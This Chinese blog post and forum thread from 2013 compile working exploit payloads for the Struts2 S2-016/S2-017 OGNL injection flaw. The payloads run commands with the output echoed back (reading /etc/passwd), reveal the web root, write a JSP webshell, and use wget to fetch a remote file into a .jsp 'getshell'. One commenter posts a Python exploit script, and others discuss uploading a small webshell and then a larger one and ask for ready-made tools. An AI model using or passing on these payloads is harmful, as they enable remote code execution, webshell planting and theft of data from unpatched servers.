Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理

  • A+
所属分类:lcx

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。

喜欢就点一下感谢吧^_^

带回显命令执行:

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆路径:

http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

写文件:

http://www.example.com/struts2-blank/example/X.action?redirect:${ 
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
 %23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\", "/"), 
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
 }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

写入的文件内容:


其实就是一个jsp的小马,需要客户端配合

函数f是文件名,t是内容

客户端:







就在当前目录建立一个fjp.jsp

shell:http://www.example.com/struts2-blank/example/fjp.jsp

还有@园长的一个客户端:

jsp-园长
URL:   FileName:   Upload

还有@X发的一个wget的getshell

?redirect:${%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
 )).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}

[原文地址]

相关讨论:

1#

DragonEgg | 2013-07-17 22:45

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。

2#

Jewer (苦逼的人生。) | 2013-07-17 22:46

- -好吧!!我顶一下0 0

3#

Ivan | 2013-07-17 22:46

这个屌……

4#

DragonEgg | 2013-07-17 22:47

还有@X发的一个getshell

?redirect:${%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}

5#

kissy | 2013-07-17 22:47

非常的感谢 楼主 求 工具啊

6#

修码的马修 | 2013-07-17 22:49

这……累趴多少黑阔

7#

kissy | 2013-07-17 22:50

这么先进的信息在什么地方 拿到的?

8#

rootsecurity | 2013-07-17 22:51

牛逼

9#

墨水心_Len | 2013-07-17 22:56

今天就是IT界的一个悲剧!

10#

Icyblade | 2013-07-17 23:06

Getshell的基本思路是先爆路径,然后通过路径上传小马(就是上传大马的马,url不能过长所以只能先传小马),然后用小马传大马。这里有点扯的是http://a.com/b/c/d.action传上去的小马有可能在http://a.com/b/里面也有可能在http://a.com/b/c/里面,晚上写工具的时候一直在纠结这个问题,求大神拯救

11#

小胖胖要减肥 | 2013-07-17 23:14

Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理

@rootsecurity 京东的菊花

12#

kissy | 2013-07-17 23:14

@Icyblade 大神 你的工具是 用什么语言写的? 可以说说如何写工具吗?

13#

LauRen | 2013-07-17 23:16

求合成工具

14#

天朝城管 | 2013-07-17 23:43

一帮白帽子在wooyun上刷struts2,一帮黑帽子在地下脱裤。裤漏了,黑帽子溜了。白帽子被判刑x年,出来后感叹WQNMLGB

15#感谢(1)

DragonEgg | 2013-07-17 23:47

= =!点 感谢 啊。。

16#

LauRen | 2013-07-17 23:49

@DragonEgg 感谢以点

17#

isaac | 2013-07-17 23:53

# coding: utf-8
import string
import random
import urllib


# 简单 POC
bait = "".join(random.sample(list(string.letters), 32))
"""
%{
#bait=new java.lang.String('test_str'),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#bait),
#resp.flush(),
#resp.close()
}
"""
simple_poc = "%{"
simple_poc += "#bait=new java.lang.String('{0}'),".format(bait)
simple_poc += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),"
simple_poc += "#resp.println(#bait),"
simple_poc += "#resp.flush(),"
simple_poc += "#resp.close()"
simple_poc += "}"


# 获取网站物理路径
"""
%{
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#webroot=#req.getSession().getServletContext().getRealPath('/'),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#webroot),
#resp.flush(),
#resp.close()
}
"""
webroot_exp = "%{"
webroot_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),"
webroot_exp += "#webroot=#req.getSession().getServletContext().getRealPath('/'),"
webroot_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),"
webroot_exp += "#resp.println(#webroot),"
webroot_exp += "#resp.flush(),"
webroot_exp += "#resp.close()"
webroot_exp += "}"


# 执行命令
"""
%{
#ps=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start().getInputStream(),
#buf=new char[50000],
new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#buf),
#resp.flush(),
#resp.close()
}
"""
execute_exp = "%%{"
execute_exp += "#ps=(new java.lang.ProcessBuilder(new java.lang.String[]{%s})).start().getInputStream(),"
execute_exp += "#buf=new char[50000],"
execute_exp += "new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf),"
execute_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),"
execute_exp += "#resp.println(#buf),"
execute_exp += "#resp.flush(),"
execute_exp += "#resp.close()"
execute_exp += "}"


# 写webshell
"""
%{
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#sio=new java.lang.StringBuffer(),
#sio.append(#req.getRealPath(%s)),
#response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#response.println(#sio),
#response.close(),
#fos=new java.io.FileOutputStream(#sio),
#fos.write(#req.getParameter('%s').getBytes()),
#fos.close()}
"""
getshell_exp = "%%{"
getshell_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),"
getshell_exp += "#sio=new java.lang.StringBuffer(),"
getshell_exp += "#sio.append(#req.getRealPath('%s')),"
getshell_exp += "#response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),"
getshell_exp += "#response.println(#sio),"
getshell_exp += "#response.close(),"
getshell_exp += "#fos=new java.io.FileOutputStream(#sio),"
getshell_exp += "#fos.write(#req.getParameter('%s').getBytes()),"
getshell_exp += "#fos.close()}"


def test_simple_poc(url):
    for prefix in ["action:", "redirect:", "redirectAction:"]:
        if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(simple_poc))).read():
            return True
    return False


def test_webroot_exp(url):
    for prefix in ["action:", "redirect:", "redirectAction:"]:
        resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(webroot_exp))).read().lower()
        if not resp.startswith("") and not resp.endswith(""):
            return resp


def test_execute_exp(url):
    for prefix in ["action:", "redirect:", "redirectAction:"]:
        resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(execute_exp % "'ifconfig'"))).read().lower()
        if not resp.startswith("") and not resp.endswith(""):
            return resp


def test_getshell_exp(url):
    for prefix in ["action:", "redirect:", "redirectAction:"]:
        resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(getshell_exp % ("shell.txt", "c"))),
                              data="c=bazinga").read().lower()
        if not resp.startswith("") and not resp.endswith(""):
            return resp

18#

锄禾哥 ("%&) | 2013-07-18 01:31

看到楼上的python 我都忍不住出来冒泡了。。。。好人一生平安。thank打码。

19#

dave | 2013-07-18 01:40

哈哈。。谢谢 提示 可以自己写工具了

20#

hack雪花 | 2013-07-18 02:03

@dave 求写的发[email protected]

21#

dave | 2013-07-18 02:25

@hack雪花 已经有现成的工具啦。我只不过当学习。这世界已经有轮子啦。哈哈

22#

HK骚年 | 2013-07-18 04:54

求具体详细利用思路。主要是写马那块的。QQ:498532059

23#

火星人 (不会技术活) | 2013-07-18 08:51

@小胖胖要减肥 截图完去啊

24#

无聊哥 | 2013-07-18 09:03

@天朝城管 不错的说法

留言评论(旧系统):

佚名 @ 2013-07-18 10:48:56

核總的速度真快,现在ST2可谓是满城风雨哈

本站回复:

昨天就满城风雨了,各种工具党,各种黑……

咖啡 @ 2013-07-18 13:41:40

昨天睡了个午觉,2点多起来全在讨论Struts2

本站回复:

一帮抓鸡狂……

独自等待 @ 2013-07-21 17:21:37

我本来也想写一个Getshell的,但是由于linux和windows下面的getshell不太一样就没有整,分享一个php版的吧,自动获取路径,以及可以执行自定义命令。http://www.waitalone.cn/struts2-s2-16-exploits.html

本站回复:

Good.

文章来源于lcx.cc:Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: